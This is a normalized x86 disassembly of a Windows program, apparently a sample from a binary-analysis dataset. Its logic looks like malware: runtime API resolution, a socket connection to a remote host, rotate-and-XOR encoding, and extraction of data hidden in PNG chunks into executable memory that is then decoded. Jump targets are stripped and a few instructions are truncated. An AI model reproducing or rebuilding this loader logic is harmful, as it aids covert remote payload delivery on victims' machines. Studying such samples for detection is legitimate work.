lea eax [ esi + 0x6d4 ]
push eax
call [ esi + 0x698 ]
cmp eax ebx
mov [ ebp + 0x8 ] eax
je r-xdata
lea eax [ esi + 0x6a4 ]
push eax
call [ esi + 0x698 ]
cmp eax ebx
mov [ ebp - 0x4 ] eax
je r-xdata
lea eax [ esi + 0xc9e ]
push eax
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x50 ] eax
je r-xdata
lea eax [ esi + 0xc3e ]
push eax
push [ ebp - 0x4 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x24 ] eax
je r-xdata
lea eax [ esi + 0x91e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x5c ] eax
je r-xdata
lea eax [ esi + 0xc2e ]
push eax
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0xc ] eax
je r-xdata
lea eax [ esi + 0xcbe ]
push eax
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x30 ] eax
je r-xdata
lea eax [ esi + 0x754 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x2c ] eax
je r-xdata
lea eax [ esi + 0x92e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x60 ] eax
je r-xdata
lea eax [ esi + 0x986 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x8 ] eax
je r-xdata
lea eax [ esi + 0x95e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x34 ] eax
je r-xdata
lea eax [ esi + 0x93e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x18 ] eax
je r-xdata
lea eax [ esi + 0x96e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x58 ] eax
je r-xdata
lea eax [ esi + 0x996 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x1c ] eax
je r-xdata
lea eax [ esi + 0x976 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x44 ] eax
je r-xdata
lea eax [ esi + 0x9a6 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x4c ] eax
je r-xdata
lea eax [ esi + 0x97e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x28 ] eax
je r-xdata
lea eax [ esi + 0x9be ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x20 ] eax
jne r-xdata
lea eax [ esi + 0x9ae ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x40 ] eax
je r-xdata
or eax 0xffffffff
jmp r-xdata
lea eax [ esi + 0x8b4 ]
push eax
push [ ebp - 0x4 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x54 ] eax
je r-xdata
pop edi
pop esi
pop ebx
leave
retn 0x4
lea eax [ esi + 0xc7e ]
push eax
push [ ebp - 0x4 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x10 ] eax
je r-xdata
mov eax [ esi + 0xd22 ]
cmp eax ebx
mov [ ebp - 0x38 ] eax
je r-xdata
xor eax eax
lea edi [ ebp - 0x97 ]
mov [ ebp - 0x98 ] bl
mov [ ebp - 0x74 ] bl
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
stosw [ edi ]
stosb [ edi ]
xor eax eax
lea edi [ ebp - 0x73 ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
stosd [ edi ]
stosw [ edi ]
stosb [ edi ]
push 0x1f
xor eax eax
pop ecx
lea edi [ ebp - 0x117 ]
mov [ ebp - 0x118 ] bl
mov [ ebp - 0x3c ] 0x1
[ edi ]
stosw [ edi ]
stosb [ edi ]
lea eax [ ebp - 0x74 ]
mov [ ebp - 0x14 ] ebx
push eax
lea eax [ ebp - 0x98 ]
push eax
lea eax [ esi + 0x48 ]
push eax
lea eax [ esi + 0x378 ]
push eax
call [ ebp - 0x50 ]
add esp 0x10
lea eax [ ebp - 0x98 ]
mov [ ebp - 0x84 ] 0x2
push eax
call [ ebp - 0x24 ]
cmp eax 0xf
jg r-xdata
lea eax [ ebp - 0x98 ]
push eax
call [ ebp - 0x5c ]
mov [ ebp - 0x80 ] eax
lea eax [ ebp - 0x74 ]
push eax
call [ ebp - 0xc ]
test eax eax
pop ecx
jle r-xdata
lea eax [ ebp - 0x74 ]
push eax
call [ ebp - 0xc ]
cmp eax 0xffff
pop ecx
jge r-xdata
lea eax [ ebp - 0x74 ]
push eax
call [ ebp - 0xc ]
pop ecx
push eax
call [ ebp - 0x2c ]
mov [ ebp - 0x82 ] ax
lea eax [ ebp - 0x3ac ]
push eax
push 0x202
call [ ebp - 0x60 ]
test eax eax
jne r-xdata
push ebx
push ebx
push ebx
push 0x6
push 0x1
push 0x2
call [ ebp - 0x34 ]
mov edi eax
cmp edi 0xffffffff
jne r-xdata
lea eax [ ebp - 0x84 ]
push 0x10
push eax
push edi
call [ ebp - 0x58 ]
cmp eax 0xffffffff
je r-xdata
push eax
call [ ebp - 0x8 ]
jmp r-xdata
push 0x2
push edi
call [ ebp - 0x40 ]
push edi
call [ ebp - 0x8 ]
call [ ebp - 0x18 ]
push [ ebp + 0x8 ]
add esi 0x6a0
call [ esi ]
push [ ebp - 0x4 ]
call [ esi ]
push [ ebp - 0x48 ]
call [ esi ]
lea eax [ ebp - 0x3c ]
push eax
push 0x8004667e
push edi
call [ ebp - 0x1c ]
cmp eax 0xffffffff
jne r-xdata
call [ ebp - 0x18 ]
mov eax ebx
jmp r-xdata
lea eax [ esi + 0x14 ]
push ebx
push 0x14
push eax
push edi
call [ ebp - 0x44 ]
cmp eax 0xffffffff
je r-xdata
push edi
call [ ebp - 0x8 ]
push 0x1
pop ebx
lea eax [ ebp - 0x118 ]
push 0x80
push eax
mov [ ebp - 0x218 ] edi
mov [ ebp - 0x21c ] 0x1
call [ ebp - 0x54 ]
push ebx
push ebx
lea eax [ ebp - 0x21c ]
push ebx
push eax
push ebx
call [ ebp - 0x4c ]
cmp eax 0xffffffff
je r-xdata
lea eax [ ebp - 0x21c ]
push eax
push edi
call [ ebp - 0x20 ]
test eax eax
je r-xdata
cmp [ ebp - 0x14 ] ebx
je r-xdata
push ebx
lea eax [ ebp - 0x118 ]
push 0x7f
push eax
push edi
call [ ebp - 0x28 ]
cmp eax 0xffffffff
je r-xdata
lea eax [ esi + 0x14 ]
push 0x10
push eax
lea eax [ ebp - 0x118 ]
push eax
call [ ebp - 0x30 ]
add esp 0xc
test eax eax
je r-xdata
lea eax [ esi + 0xcde ]
push eax
lea eax [ ebp - 0x118 ]
push eax
call [ ebp - 0x10 ]
test eax eax
jne r-xdata
lea eax [ esi + 0xcee ]
push eax
lea eax [ ebp - 0x118 ]
push eax
call [ ebp - 0x10 ]
test eax eax
jne r-xdata
push edi
push esi
call [ ebp - 0x38 ]
jmp r-xdata
mov [ ebp - 0x14 ] 0x1
sub_4037c6
push esi
mov esi [ esp + 0x8 ]
push edi
push 0x1
mov al [ esi ]
pop edi
mov cl al
shl cl 0x3
shr al 0x5
or cl al
xor cl [ esp + 0x10 ]
cmp [ esp + 0x14 ] edi
mov [ esi ] cl
jbe r-xdata
pop edi
pop esi
retn 0xc
mov dl [ edi + esi ]
lea eax [ edi + esi ]
mov cl dl
shl cl 0x3
shr dl 0x5
or cl dl
mov [ eax ] cl
mov dl [ edi + esi - 0x1 ]
xor dl cl
inc edi
cmp edi [ esp + 0x14 ]
mov [ eax ] dl
jb r-xdata
sub_40380d
mov eax [ esp + 0xc ]
push esi
mov esi [ esp + 0x8 ]
lea ecx [ eax - 0x1 ]
test ecx ecx
jbe r-xdata
mov al [ esi ]
xor al [ esp + 0xc ]
mov cl al
shr cl 0x3
shl al 0x5
or cl al
mov [ esi ] cl
pop esi
retn 0xc
mov al [ ecx + esi - 0x1 ]
xor al [ ecx + esi ]
mov dl al
shr dl 0x3
shl al 0x5
or dl al
mov [ ecx + esi ] dl
dec ecx
jne r-xdata
sub_40384a
push ebp
mov ebp esp
sub esp 0x288
push ebx
push esi
push edi
push 0x40
xor ebx ebx
pop ecx
xor eax eax
lea edi [ ebp - 0x287 ]
mov [ ebp - 0x288 ] bl
push 0x40
[ edi ]
stosw [ edi ]
stosb [ edi ]
pop ecx
xor eax eax
lea edi [ ebp - 0x183 ]
mov [ ebp - 0x184 ] bl
[ edi ]
stosw [ edi ]
stosb [ edi ]
xor eax eax
lea edi [ ebp - 0x17 ]
mov [ ebp - 0x18 ] bl
mov esi [ ebp + 0x8 ]
stosw [ edi ]
stosb [ edi ]
xor eax eax
lea edi [ ebp - 0x63 ]
mov [ ebp - 0x64 ] bl
mov [ ebp - 0x2c ] 0x7a
stosd [ edi ]
stosd [ edi ]
lea eax [ esi + 0x6e4 ]
mov [ ebp - 0x2b ] 0x54
push eax
mov [ ebp - 0x2a ] 0x58
mov [ ebp - 0x29 ] 0x74
mov [ ebp - 0x28 ] bl
mov [ ebp - 0x38 ] 0x89
mov [ ebp - 0x37 ] 0x50
mov [ ebp - 0x36 ] 0x4e
mov [ ebp - 0x35 ] 0x47
mov [ ebp - 0x34 ] 0xd
mov [ ebp - 0x33 ] 0xa
mov [ ebp - 0x32 ] 0x1a
mov [ ebp - 0x31 ] 0xa
mov [ ebp - 0x30 ] bl
mov [ ebp - 0x24 ] 0x49
mov [ ebp - 0x23 ] 0x45
mov [ ebp - 0x22 ] 0x4e
mov [ ebp - 0x21 ] 0x44
mov [ ebp - 0x20 ] bl
mov [ ebp - 0x10 ] ebx
mov [ ebp - 0x58 ] ebx
mov [ ebp - 0x70 ] ebx
mov [ ebp - 0x4c ] ebx
call [ esi + 0x698 ]
cmp eax ebx
mov [ ebp + 0x8 ] eax
je r-xdata
xor eax eax
lea eax [ esi + 0x6d4 ]
push eax
call [ esi + 0x698 ]
test eax eax
je r-xdata
lea eax [ esi + 0x6a4 ]
push eax
call [ esi + 0x698 ]
mov edi eax
cmp edi ebx
je r-xdata
lea eax [ esi + 0xa4e ]
push eax
push [ ebp + 0x8 ]
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x74 ] eax
je r-xdata
lea eax [ esi + 0xc6e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x68 ] eax
je r-xdata
lea eax [ esi + 0xc4e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x7c ] eax
je r-xdata
lea eax [ esi + 0x7bc ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x50 ] eax
je r-xdata
lea eax [ esi + 0x800 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x4 ] eax
je r-xdata
lea eax [ esi + 0x7e4 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x78 ] eax
je r-xdata
lea eax [ esi + 0x7d8 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x14 ] eax
je r-xdata
lea eax [ esi + 0x880 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x48 ] eax
je r-xdata
lea eax [ esi + 0x7c8 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x80 ] eax
je r-xdata
lea eax [ esi + 0x80c ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x1c ] eax
je r-xdata
lea eax [ esi + 0xc7e ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x3c ] eax
je r-xdata
lea eax [ esi + 0x8a4 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x6c ] eax
je r-xdata
lea eax [ esi + 0x8c4 ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp - 0x54 ] eax
je r-xdata
lea eax [ esi + 0x77c ]
push eax
push edi
call [ esi + 0x69c ]
cmp eax ebx
mov [ ebp + 0x8 ] eax
je r-xdata
lea eax [ esi + 0xd4 ]
push 0x3
push eax
lea eax [ ebp - 0x18 ]
push eax
call [ ebp - 0x68 ]
lea eax [ ebp - 0x288 ]
add esi 0x1f8
push eax
lea eax [ ebp - 0x18 ]
push 0x1
push eax
push esi
call [ ebp - 0x48 ]
test eax eax
je r-xdata
lea eax [ ebp - 0x184 ]
push eax
lea eax [ ebp - 0x18 ]
push ebx
push eax
push esi
call [ ebp - 0x48 ]
test eax eax
je r-xdata
push ebx
lea eax [ ebp - 0x288 ]
push ebx
push eax
push [ ebp + 0x10 ]
push ebx
call [ ebp - 0x74 ]
test eax eax
jne r-xdata
lea eax [ ebp - 0x288 ]
push eax
call [ ebp - 0x4 ]
lea eax [ ebp - 0x184 ]
push eax
call [ ebp - 0x4 ]
mov edi 0x80
push ebx
push edi
push 0x3
push ebx
push 0x1
lea eax [ ebp - 0x288 ]
push 0x80000000
push eax
call [ ebp - 0x50 ]
mov esi eax
cmp esi 0xffffffff
je r-xdata
push ebx
push esi
call [ ebp - 0x80 ]
push ebx
push edi
push 0x3
push ebx
push 0x3
lea eax [ ebp - 0x184 ]
push 0xc0000000
push eax
call [ ebp - 0x50 ]
mov edi eax
cmp edi 0xffffffff
mov [ ebp + 0x10 ] edi
je r-xdata
lea eax [ ebp - 0x8 ]
push ebx
push eax
lea eax [ ebp - 0x64 ]
push 0x8
push eax
push esi
call [ ebp - 0x14 ]
test eax eax
jne r-xdata
lea eax [ ebp - 0x38 ]
mov [ ebp - 0x5c ] bl
push eax
lea eax [ ebp - 0x64 ]
push eax
call [ ebp - 0x3c ]
test eax eax
jne r-xdata
push esi
call [ ebp + 0x8 ]
push edi
call [ ebp + 0x8 ]
lea eax [ ebp - 0x184 ]
push eax
call [ ebp - 0x4 ]
jmp r-xdata
push ebx
push ebx
push 0x8
lea eax [ ebp - 0x288 ]
push eax
call [ ebp - 0x4 ]
mov eax ebx
jmp r-xdata
lea eax [ ebp - 0x24 ]
push eax
lea eax [ ebp - 0x44 ]
push eax
call [ ebp - 0x3c ]
test eax eax
je r-xdata
push 0x1
push ebx
push ebx
push esi
call [ ebp - 0x1c ]
mov [ ebp - 0x58 ] eax
mov eax [ ebp - 0xc ]
mov [ ebp - 0x10 ] eax
mov [ ebp - 0x4c ] 0x1
pop edi
pop esi
pop ebx
leave
retn 0xc
cmp [ ebp - 0x4c ] ebx
je r-xdata
mov eax [ ebp - 0xc ]
push 0x1
add eax 0x4
push ebx
push eax
jmp r-xdata
push esi
call [ ebp + 0x8 ]
push edi
push 0x1000
push 0x40
call [ ebp - 0x6c ]
mov edi eax
cmp edi ebx
jne r-xdata
push esi
call [ ebp - 0x1c ]
lea eax [ ebp - 0x8 ]
push ebx
push eax
lea eax [ ebp - 0xc ]
push 0x4
push eax
push esi
call [ ebp - 0x14 ]
mov eax [ ebp - 0xc ]
xor ecx ecx
mov cl [ ebp - 0xb ]
push ebx
mov ch [ ebp - 0xc ]
shr eax 0x10
movzx edx al
shl ecx 0x8
or ecx edx
xor edx edx
mov dl ah
movzx eax dl
shl ecx 0x8
or ecx eax
lea eax [ ebp - 0x8 ]
push eax
lea eax [ ebp - 0x44 ]
push 0x4
push eax
push esi
mov [ ebp - 0xc ] ecx
call [ ebp - 0x14 ]
lea eax [ ebp - 0x2c ]
mov [ ebp - 0x40 ] bl
push eax
lea eax [ ebp - 0x44 ]
push eax
call [ ebp - 0x3c ]
test eax eax
jne r-xdata
push ebx
push ebx
push [ ebp - 0x58 ]
push esi
call [ ebp - 0x1c ]
cmp [ ebp - 0x10 ] ebx
je r-xdata
push esi
call [ ebp + 0x8 ]
push [ ebp + 0x10 ]
jmp r-xdata
push esi
call [ ebp + 0x8 ]
push [ ebp + 0x10 ]
call [ ebp + 0x8 ]
push edi
call [ ebp - 0x54 ]
lea eax [ ebp - 0x184 ]
push eax
push [ ebp + 0xc ]
call [ ebp - 0x7c ]
push 0x1
pop ebx
mov eax 0x1000
push ebx
cmp [ ebp - 0x10 ] eax
jae r-xdata
call [ ebp + 0x8 ]
lea ecx [ ebp - 0x8 ]
push ecx
push eax
lea eax [ ebp - 0x8 ]
push eax
push [ ebp - 0x10 ]
jmp r-xdata
call [ GetLastError@IAT ]
push esi
call [ ebp + 0x8 ]
push [ ebp + 0x10 ]
call [ ebp + 0x8 ]
lea eax [ ebp - 0x288 ]
push eax
call [ ebp - 0x4 ]
lea eax [ ebp - 0x184 ]
push eax
call [ ebp - 0x4 ]
push edi
call [ ebp - 0x54 ]
jmp r-xdata
cmp [ ebp - 0x8 ] ebx
je r-xdata
push edi
push esi
call [ ebp - 0x14 ]
cmp eax ebx
je r-xdata
xor eax eax
cmp [ ebp - 0x8 ] ebx
jbe r-xdata
lea eax [ ebp - 0x70 ]
push ebx
push eax
push [ ebp - 0x8 ]
push edi
push [ ebp + 0x10 ]
call [ ebp - 0x78 ]
mov eax [ ebp - 0x8 ]
sub [ ebp - 0x10 ] eax
jne r-xdata
mov cl [ eax + edi ]
not cl
mov [ eax + edi ] cl
inc eax
cmp eax [ ebp - 0x8 ]
jb r-xdata
_start
push ebp
mov ebp esp
push 0xffffffff
push r--data
push _except_handler3
mov eax [ fs : 0x0 ]
push eax
mov [ fs : 0x0 ] esp
sub esp 0x68
push ebx
push esi
push edi
mov [ ebp - 0x18 ] esp
xor ebx ebx
mov [ ebp - 0x4 ] ebx
push 0x2
call [ __set_app_type@IAT ]
pop ecx
or [ rw-data ] 0xffffffff
or [ rw-data ] 0xffffffff
call [ __p__fmode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
call [ __p__commode@IAT ]
mov ecx [ rw-data ]
mov [ eax ] ecx
mov eax [ _adjust_fdiv@IAT ]
mov eax [ eax ]
mov [ rw-data ] eax
call sub_401003
cmp [ rw-data ] ebx
jne r-xdata
call sub_403f24
push rw-data
push rw-data
call _initterm
mov eax [ rw-data ]
mov [ ebp - 0x6c ] eax
lea eax [ ebp - 0x6c ]
push eax
push [ rw-data ]
lea eax [ ebp - 0x64 ]
push eax
lea eax [ ebp - 0x70 ]
push eax
lea eax [ ebp - 0x60 ]
push eax
call [ __getmainargs@IAT ]
push rw-data
push rw-data
call _initterm
add esp 0x24
mov eax [ _acmdln@IAT ]
mov esi [ eax ]
mov [ ebp - 0x74 ] esi
cmp [ esi ] 0x22
jne r-xdata
push sub_403f36
call [ __setusermatherr@IAT ]
pop ecx
cmp [ esi ] 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
mov al [ esi ]
cmp al bl
je r-xdata
mov al [ esi ]
cmp al bl
je r-xdata
inc esi
mov [ ebp - 0x74 ] esi
jmp r-xdata
cmp [ esi ] 0x22
jne r-xdata
cmp al 0x22
jne r-xdata
mov [ ebp - 0x30 ] ebx
lea eax [ ebp - 0x5c ]
push eax
call [ GetStartupInfoA@IAT ]
test [ ebp - 0x30 ] 0x1
je r-xdata
cmp al 0x20
jbe r-xdata
inc esi
mov [ ebp - 0x74 ] esi
push 0xa
pop eax
movzx eax [ ebp - 0x2c ]
jmp r-xdata
push eax
push esi
push ebx
push ebx
call [ GetModuleHandleA@IAT ]
push eax
call sub_4017ff
mov [ ebp - 0x68 ] eax
push eax
call [ exit@IAT ]
sub_401000
mov eax ecx
retn
sub_401003
retn
sub_4015f5
mov eax ecx
and [ eax ] 0x0
and [ eax + 0x4 ] 0x0
retn
sub_4015ff
cmp [ ecx + 0x4 ] 0x0
jne r-xdata
retn
push 0x0
call free
pop ecx
sub_401666
push esi
mov esi ecx
cmp [ esi ] 0x0
jne r-xdata
pop esi
retn
push rw-data
push rw-data
call [ GetModuleHandleA@IAT ]
push eax
call [ GetProcAddress@IAT ]
mov [ esi ] eax
sub_4017ab
call sub_4017b5
jmp sub_4017bf
sub_4017b5
mov ecx rw-data
jmp sub_401000
sub_4017bf
push sub_4017cb
call sub_403da2
pop ecx
retn
sub_4017cb
mov ecx rw-data
jmp sub_401003
sub_4017d5
call sub_4017df
jmp sub_4017e9
sub_4017df
mov ecx rw-data
jmp sub_401000
sub_4017e9
push sub_4017f5
call sub_403da2
pop ecx
retn
sub_4017f5
mov ecx rw-data
jmp sub_401003
sub_4027fe
push [ rw-data ]
call free
pop ecx
retn
fclose
jmp [ fclose@IAT ]
fseek
jmp [ fseek@IAT ]
sprintf
jmp [ sprintf@IAT ]
fopen
jmp [ fopen@IAT ]
strcpy
jmp [ strcpy@IAT ]
memset
jmp [ memset@IAT ]
fread
jmp [ fread@IAT ]
memcpy
jmp [ memcpy@IAT ]
free
jmp [ free@IAT ]
realloc
jmp [ realloc@IAT ]
malloc
jmp [ malloc@IAT ]
strlen
jmp [ strlen@IAT ]
??3@YAXPAX@Z
jmp [ operator delete@IAT ]
??2@YAPAXI@Z
jmp [ operator new@IAT ]
_except_handler3
jmp [ _except_handler3@IAT ]
sub_403d76
cmp [ rw-data ] 0xffffffff
jne r-xdata
push rw-data
push rw-data
push [ esp + 0xc ]
call __dllonexit
add esp 0xc
retn
push [ esp + 0x4 ]
call [ _onexit@IAT ]
pop ecx
retn
sub_403da2
push [ esp + 0x4 ]
call sub_403d76
neg eax
sbb eax eax
pop ecx
neg eax
dec eax
retn
__dllonexit
jmp [ __dllonexit@IAT ]
_XcptFilter
jmp [ _XcptFilter@IAT ]
_initterm
jmp [ _initterm@IAT ]
sub_403f24
push 0x30000
push 0x10000
call _controlfp
pop ecx
pop ecx
retn
sub_403f36
xor eax eax
retn
_controlfp
jmp [ _controlfp@IAT ]
_wcsnicmp
jmp [ _wcsnicmp@IAT ]
